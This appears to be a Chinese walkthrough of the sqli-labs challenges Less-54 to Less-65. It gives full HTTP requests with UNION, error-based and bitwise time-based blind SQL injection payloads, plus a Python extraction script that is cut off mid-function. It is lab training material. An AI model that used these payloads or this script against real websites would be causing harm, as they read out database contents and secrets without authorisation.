Less-54:Challenge-1

  1. 获得表名,字段名
  2. 获得表内容
GET /Less-54/index.php?id=-1' union SELECT 1,GROUP_CONCAT(TABLE_NAME),GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=d8f93ca9310aad27c365bfe954c7db58; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628150103.jpg

GET /Less-54/index.php?id=-1' union SELECT 1,2,concat(id,'^',sessid,'^',secret_SPTS,'^',tryy) from challenges.X8J8LJ350P--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=d8f93ca9310aad27c365bfe954c7db58; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628150421.jpg

Less-55:Challenge-2

  1. 获得表名,字段名
  2. 获得表内容
GET /Less-55/index.php?id=-1) union SELECT 1,GROUP_CONCAT(TABLE_NAME),GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=6dc1db86de91d7b72dd07106bf78a073; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628150651.jpg

GET /Less-55/index.php?id=-1) union SELECT 1,2,concat(id,'^',sessid,'^',secret_WADC,'^',tryy) from challenges.IVP17DF90B--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=6dc1db86de91d7b72dd07106bf78a073; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628151239.jpg

Less-56:Challenge-3

GET /Less-56/index.php?id=-1') union SELECT 1,GROUP_CONCAT('challenges.',TABLE_NAME),GROUP_CONCAT(COLUMN_NAME,',\'^\'') FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges';--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628153454.jpg

GET /Less-56/index.php?id=-1') union SELECT 1,2,concat(id,'^',sessid,'^',secret_0JFT,'^',tryy) from challenges.VIS34ABI7I--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628153558.jpg

Less-57:Challenge-4

GET /Less-57/index.php?id=-1" union SELECT 1,GROUP_CONCAT(TABLE_NAME),GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges';--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628154007.jpg

GET /Less-57/index.php?id=-1" union SELECT 1,2,concat(id,'^',sessid,'^',secret_0P5J,'^',tryy) from challenges.3QPP2IAS7Y--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628154135.jpg

Less-58:Challenge-5

GET /Less-58/index.php?id=1' and updatexml(1,concat('^',(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'),'^'),1) and 1='1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628160213.jpg

GET /Less-58/index.php?id=1' and updatexml(1,concat('^',(SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'),'^'),1) and 1='1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628160305.jpg

GET /Less-58/index.php?id=1' and updatexml(1,concat('^',(SELECT secret_V82L from challenges.UABFNOT2PY),'^'),1) and 1='1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628160621.jpg

Less-59:Challenge-6

GET /Less-59/index.php?id=1 and updatexml(1,concat('^',(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'),'^'),1) and 1=1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628161830.jpg

GET /Less-59/index.php?id=1 and updatexml(1,concat('^',(SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'),'^'),1) and 1=1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628161905.jpg

GET /Less-59/index.php?id=1 and updatexml(1,concat('^',(SELECT concat(secret_1C1M) from challenges.VNMF274FG8),'^'),1) and 1=1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628162840.jpg

Less-60:Challenge-7

GET /Less-60/index.php?id=1" and updatexml(1,concat('^',(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'),'^'),1) and 1="1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628163028.jpg

GET /Less-60/index.php?id=1" and updatexml(1,concat('^',(SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'),'^'),1) and 1="1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628163208.jpg

GET /Less-60/index.php?id=1" and updatexml(1,concat('^',(SELECT concat(secret_O36W) from challenges.ZUNIN4CQQD),'^'),1)  and 1="1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628163243.jpg

Less-61:Challenge-8

GET /Less-61/index.php?id=1') and updatexml(1,concat('^',(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'),'^'),1) and 1=('1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628163338.jpg

GET /Less-61/index.php?id=1') and updatexml(1,concat('^',(SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'),'^'),1) and 1=('1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628163428.jpg

GET /Less-61/index.php?id=1') and updatexml(1,concat('^',(SELECT concat(secret_7TPW) from challenges.AVHQSLF5YD),'^'),1)  and 1=('1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628163508.jpg

Less-62-65

一共130次的尝试机会,这就是盲注,自己第一反应就是暴力穷举盲注,然后想到二分法盲注还是不够,最后查资料发现还有利用穷举比特位的方法

  • 采用暴力枚举盲注(使用等于号枚举)需要 10*(10+26)+4*(10+26)+24*(10+26+26) = 1992次
  • 采用二分法盲注(使用大于,小于,等于判断枚举)需要 (10+4+24)*log2(10)+(10+4+24*2)*log2(26) ≈ 418次(理想情况下)
  • 一个字符8个比特,一次判断出3比特,一个字符判断3次,一共10+4+24=38个字符,大约38*3=114次
  • 我们每次可以获取3bit数据,我们再利用sleep判断获取1bit信息,这样我们就可以每次获取4bit数据,并且实现一个字符2次请求即可.一共24+10+4=38个字符,每个字符2次请求,共需要38*2=76次请求即可

思路

输入1-12会返回不同的结果

QQ截图20220628170454.jpg

QQ截图20220628170508.jpg

  • 我们可以使用暴力枚举比特位的方法。利用右移(>>)运算符预设要判断的位置
-- Console form of the probe: for every table name in `challenges`, read bits
-- 3-5 of its first character (ascii value shifted right by 3, then masked with
-- 111) and map that 3-bit value 0..7 onto 1..8.
-- bin() returns the bits as a *string of digits*; `& 7` reads that string as a
-- decimal number, which still yields the low three binary digits because
-- 10^k = 2^k (mod 8) for k < 3 and 10^k = 0 (mod 8) for k >= 3.
select case bin(ascii(substr(table_name, 1, 1))>>3) & (POW(2,0)+POW(2,1)+POW(2,2))
when 0 then 1
when 1 then 2
when 2 then 3
when 3 then 4
when 4 then 5
when 5 then 6
when 6 then 7
-- value 7 (and anything unexpected) falls through to 8; the remaining columns
-- print the full bit string, the mask (111) and the character itself so the
-- result can be checked by eye.
else 8 end, bin(ascii(substr(table_name, 1, 1))),bin(POW(2,0)+POW(2,1)+POW(2,2)), substr(table_name, 1, 1)
from information_schema.tables where table_schema='challenges'

QQ截图20220628170824.jpg

使用上述代码,爆破challenges的第一个表的第一个字符的0-2比特位(3个比特位),并返回某种对应的值.例如字符b的二进制为01100010,低三位为010,和111进行与运算,得到010(十进制为2),根据条件,返回数值3.上述是根据返回状态的盲注

  • 一个字符8个比特,一次判断出3比特,一个字符判断3次,一共10+4+24=38个字符,大约38*3=114次
  • 保证我们需要的数字为输入参数,我们需要先分析语句的类型为整型或字符型(有没有括号闭合),再利用位运算实现得到指定的数值。使用手动判断的方法判断出闭合类型为字符型(单引号、括号闭合)。

QQ截图20220628171125.jpg

但是在网页请求中使用,需要进行url编码

QQ截图20220628171238.jpg

需要我们将&|进行URL编码,才可以正常执行。实现我们输入的参数id为1,但是返回的结果为我们指定的id为3的信息。同上需要将+使用%2B编码,否则会被php转换为空格

  • 我们还可以再减少次数,刚才每个字符需要3次请求,我们可以再缩减到2次
  • 我们请求后除了有显示的不同状态,其实还有一个状态--请求时间或者延时
  • 我们每次可以获取3bit数据,我们再利用sleep判断获取1bit信息,这样我们就可以每次获取4bit数据,并且实现一个字符2次请求即可
  • 具体的是第一次请求,获取0-2位时,使用if判断第6位的数据;第二次请求,获取3-5位时,使用if连接判断第7位的数据
-- Console form of the 4-bit probe, request 1 of 2 per character.
-- Bits 0-2 come back as the CASE value (0..6 -> 1..7, anything else -> 8).
-- Bit 6 comes back as a delay: the IF calls sleep(2) only when that bit is set.
-- The trailing `& 0` zeroes the IF's result, so the `|` leaves the CASE value
-- untouched and only the response time differs.
-- bin() yields a digit string and `& 7` / `& 1` read it as decimal; the low
-- bits are still correct because 10^k = 2^k (mod 8) for k < 3 and 0 (mod 8) above.
select case bin(ascii(substr(table_name, 1, 1))>>0) & (POW(2,0)+POW(2,1)+POW(2,2))
when 0 then 1
when 1 then 2
when 2 then 3
when 3 then 4
when 4 then 5
when 5 then 6
when 6 then 7
else 8 end | (if(bin(ascii(substr(table_name, 1, 1))>>6) & (POW(2,0)), sleep(2),1) & 0)
from information_schema.tables where table_schema='challenges';


-- Console form of the 4-bit probe, request 2 of 2 per character.
-- Bits 3-5 come back as the CASE value (ascii shifted right by 3, then masked;
-- 0..6 -> 1..7, anything else -> 8).
-- Bit 7 comes back as a delay: the IF calls sleep(2) only when that bit is set,
-- and the trailing `& 0` keeps the OR from changing the CASE value.
-- bin() yields a digit string and `& 7` / `& 1` read it as decimal; the low
-- bits are still correct because 10^k = 2^k (mod 8) for k < 3 and 0 (mod 8) above.
select case bin(ascii(substr(table_name, 1, 1))>>3) & (POW(2,0)+POW(2,1)+POW(2,2))
when 0 then 1
when 1 then 2
when 2 then 3
when 3 then 4
when 4 then 5
when 5 then 6
when 6 then 7
else 8 end | (if(bin(ascii(substr(table_name, 1, 1))>>7) & (POW(2,0)), sleep(2),1) & 0)
from information_schema.tables where table_schema='challenges';

获取了0-2位的数据(需要减一,即实际为4),通过查询时间,判断出第6位的数据为1,同时获取4比特数据

  • 得到第一个字符的二进制位:x1xxx100

QQ截图20220628172138.jpg

  • 获取了3-5位的数据(需要减一,即实际为0),通过查询时间,判断出第7位的数据为0,同时获取4比特数据。

  • 得到第一个字符的二进制位:01000100,即为字符D,这样,一共24+10+4=38个字符,每个字符2次请求,共需要38*2=76次请求即可

QQ截图20220628172151.jpg

# coding:utf-8
# 基于字符串比特位匹配的盲注脚本
import time

import requests
import re
import os

# Injection prefix, one per lab. Each closes that lab's quoting context and
# then appends "&0|" (%26 = '&', %7c = '|'): the original id is AND-ed to 0,
# so the probe's CASE value below becomes the effective id the page displays.
# less62
sql_fp = "1')%260%7c"
# less63
# sql_fp = "1'%260%7c"
# less64
# sql_fp = "1))%260%7c"
# less65
# sql_fp = "1\")%260%7c"
# The server is slow: a normal response already takes 2 s+, so the in-query
# delay is sleep(1) and req()/search() read the bit against a 4 s threshold.

# CASE arms: the 3-bit value 0..7 is mapped onto ids 1..8 (anything else -> 9).
_case_arms = ''.join('when {} then {} '.format(k, k + 1) for k in range(8))

# Template for name extraction (tables / columns). Placeholders are filled by req():
#   @0 -> 'table' or 'column' (expands to @0_name and information_schema.@0s)
#   @1 -> 1-based character position
#   @2 -> right shift selecting the 3-bit group read from the displayed record (0 or 3)
#   @3 -> index of the single bit read from the response delay (6 or 7)
#   @4 -> extra WHERE/LIMIT text ('' for tables)
# Operators are URL-encoded (%26 '&', %2B '+', %7c '|') so PHP does not mangle them.
sql_cmd = sql_fp + (
    "(select case bin(ascii(substr(@0_name, @1, 1))>>@2) %26 (POW(2,0)%2BPOW(2,1)%2BPOW(2,2))"
    + _case_arms +
    "else 9 end "
    "%7c (if((bin(ascii(substr(@0_name, @1, 1))>>@3) %26 POW(2,0)) = 1,sleep(1),1) %26 0)"
    "from information_schema.@0s where table_schema=database() @4 )  --+"
)

# Template for value extraction. Placeholders are filled by search():
#   @0 -> column name, @4 -> table name, @1/@2/@3 as above.
sql_search = sql_fp + (
    "(select case bin(ascii(substr(@0, @1, 1))>>@2) %26 (POW(2,0)%2BPOW(2,1)%2BPOW(2,2))"
    + _case_arms +
    "else 9 end "
    "%7c (if((bin(ascii(substr(@0, @1, 1))>>@3) %26 POW(2,0)) = 1,sleep(1),1) %26 0)"
    "from @4 )  --+"
)

url = 'http://127.0.0.1:8003/Less-62/?id='
# id -> login name the page displays for it; filled by main() (index 0 is a placeholder).
state_list = []
# Captures the "Login name" the page prints for the effective id.
rp = r'Your\s*Login\s*name\s*:\s*(.*?)<br>'
# Running request counter, incremented by req()/search().
rc = 1


def main() -> None:
    """Interactive driver for the bit-wise blind injection against Less-62.

    Steps, in order:
      1. Load the id -> "Login name" state table from ./bsl.txt, or build it by
         requesting id=1..9 once and cache it there (index 0 is a placeholder '0'
         so that a CASE value k is found at position k).
      2. Recover the first 10 characters of the table name (or read it from stdin).
      3. Recover 4 characters of the third column's name starting at character 8
         and prefix 'secret_' (or read it from stdin).
      4. Recover the first 24 characters of that column's value.
    Each character costs two requests: req()/search() return three bits from the
    displayed record and one bit from the response delay, which are OR-ed into c.
    Reads the module globals url, rp and state_list; appends to state_list.
    """

    if os.path.exists('./bsl.txt'):
        print('文件存在')
        with open('./bsl.txt', 'r') as f:
            res = f.read().split('\n')
            for i in res:
                if i != '':
                    state_list.append(i)
    else:
        print('文件不存在')

        # 0. Build the state table: request id=1..9 once and record the login
        #    name each one displays.
        print('收集状态表')
        state_list.append('0')
        for i in range(1, pow(2, 3)+2):
            u = url + str(i)
            respond = requests.get(u)
            state_list.append(re.findall(rp, respond.text)[0])
            print('.', end='')

        with open('./bsl.txt', 'w') as f:
            f.write('\n'.join(state_list))
            print('写入完成')

    print('爆破状态表:')
    print(state_list)

    # @ Table name: 10 characters, two requests per character.
    table_name_list = []
    if input('是否指定表名? y/n:') != 'y':
        print('[~]进行表名判断')
        for i in range(1, 11):
            c = 0
            # 1. Bits 0,1,2 from the displayed record, bit 6 from the delay.
            # (ASCII bits 7-5: 010 = uppercase letter; 011 = lowercase letter; 001 = digit)
            state = req('table', i, 0, 6)
            c = c | state[0] | state[1] << 6
            # print(state, '第{:d}个字符的0-2,6位为:{},{}'.format(i, str(bin(state[0]))[2:5], state[1]))

            # 2. Bits 3,4,5 from the displayed record, bit 7 from the delay.
            state = req('table', i, 3, 7)
            c = c | state[0] << 3 | state[1] << 7
            # print(state, '第{:d}个字符的3-5,7位为:{},{}'.format(i, str(bin(state[0]))[2:5], state[1]))

            print('第{:d}个字符为:[ {} ]'.format(i, chr(c)))
            table_name_list.append((chr(c)))
        table_name = ''.join(table_name_list)
        print('爆破表名为: [ {} ]'.format(table_name))
    else:
        table_name = input('输入表名:').strip()

    # @ Column name: the third column of the table is assumed to be named
    # 'secret_XXXX', so only the 4 characters after the 7-character prefix are probed.
    column_name_list = []
    offset = 7
    if input('是否指定字段名? y/n:') != 'y':
        print('[~]进行第三个字段名名判断,从第7个字符,判断4个字符出来')
        for i in range(1, 5):
            c = 0
            # 1. Bits 0,1,2 from the displayed record, bit 6 from the delay.
            # (ASCII bits 7-5: 010 = uppercase letter; 011 = lowercase letter; 001 = digit)
            state = req('column', i+offset, 0, 6, table_name=table_name)
            c = c | state[0] | state[1] << 6
            # print(state, '第{:d}个字符的0-2,6位为:{},{}'.format(i, str(bin(state[0]))[2:5], state[1]))

            # 2. Bits 3,4,5 from the displayed record, bit 7 from the delay.
            state = req('column', i+offset, 3, 7, table_name=table_name)
            c = c | state[0] << 3 | state[1] << 7
            # print(state, '第{:d}个字符的3-5,7位为:{},{}'.format(i, str(bin(state[0]))[2:5], state[1]))

            print('第{:d}个字符为:[ {} ]'.format(i, chr(c)))
            column_name_list.append((chr(c)))
        column_name = 'secret_' + ''.join(column_name_list)
        print('爆破的字段名为:[ {} ]'.format(column_name))
    else:
        column_name = input('输入字段名:').strip()

    # 9u8573nri2 / secret_WJWE: values left by the author, presumably a table and
    # column recovered in an earlier run; they are not used by the code.
    # @ Column value: 24 characters, two requests per character.
    value_list = []
    print('[~]字段值进行枚举中....')
    for i in range(1, 25):
        c = 0
        # 1. Bits 0,1,2 from the displayed record, bit 6 from the delay.
        # (ASCII bits 7-5: 010 = uppercase letter; 011 = lowercase letter; 001 = digit)
        state = search(column_name, table_name, i, 0, 6)
        c = c | state[0] | state[1] << 6
        # print(state, '第{:d}个字符的0-2,6位为:{},{}'.format(i, str(bin(state[0]))[2:5], state[1]))

        # 2. Bits 3,4,5 from the displayed record, bit 7 from the delay.
        state = search(column_name, table_name, i, 3, 7)
        c = c | state[0] << 3 | state[1] << 7
        # print(state, '第{:d}个字符的3-5,7位为:{},{}'.format(i, str(bin(state[0]))[2:5], state[1]))

        print('第{:d}个字符为:[ {} ]'.format(i, chr(c)))
        value_list.append((chr(c)))
    value = ''.join(value_list)

    print('爆破表名为: [ {} ]'.format(table_name))
    print('爆破的字段名为:[ {} ]'.format(column_name))
    print('[!]{}的值为:[ {} ]'.format(column_name, value))


def req(type, i, co, ci, **kwargs):
    """Send one name-extraction probe and decode it into [three_bit_value, delay_bit].

    Args:
        type: 'table' or 'column'; substituted for @0 in sql_cmd, so it selects
            information_schema.tables/columns and the table_name/column_name field.
        i: 1-based position of the character being probed.
        co: right shift applied before masking the 3-bit group (main() uses 0 or 3).
        ci: index of the single bit read through the sleep() delay (main() uses 6 or 7).
        **kwargs: for type == 'column', `table_name` narrows the query to that
            table's third column (`limit 2,1`).

    Returns:
        A two-element list: the 3-bit group as an int (position of the displayed
        login name in state_list, minus one) and 1 if the response took more
        than 4 s (the sleep fired), else 0.

    Raises:
        IndexError: if no "Login name" line is found in the response.
        KeyError: if type == 'column' and table_name was not supplied.

    Side effects: prints and increments the module-level request counter rc.
    """
    global rc
    if type == 'column':
        extra_clause = "and table_name = '{}' limit 2,1".format(kwargs['table_name'])
    else:
        extra_clause = ''
    substitutions = (
        ('@0', type),
        ('@1', str(i)),
        ('@2', str(co)),
        ('@3', str(ci)),
        ('@4', extra_clause),
    )
    payload = sql_cmd
    for marker, text in substitutions:
        payload = payload.replace(marker, text)

    print('[!]第{:d}次请求......'.format(rc))
    rc += 1
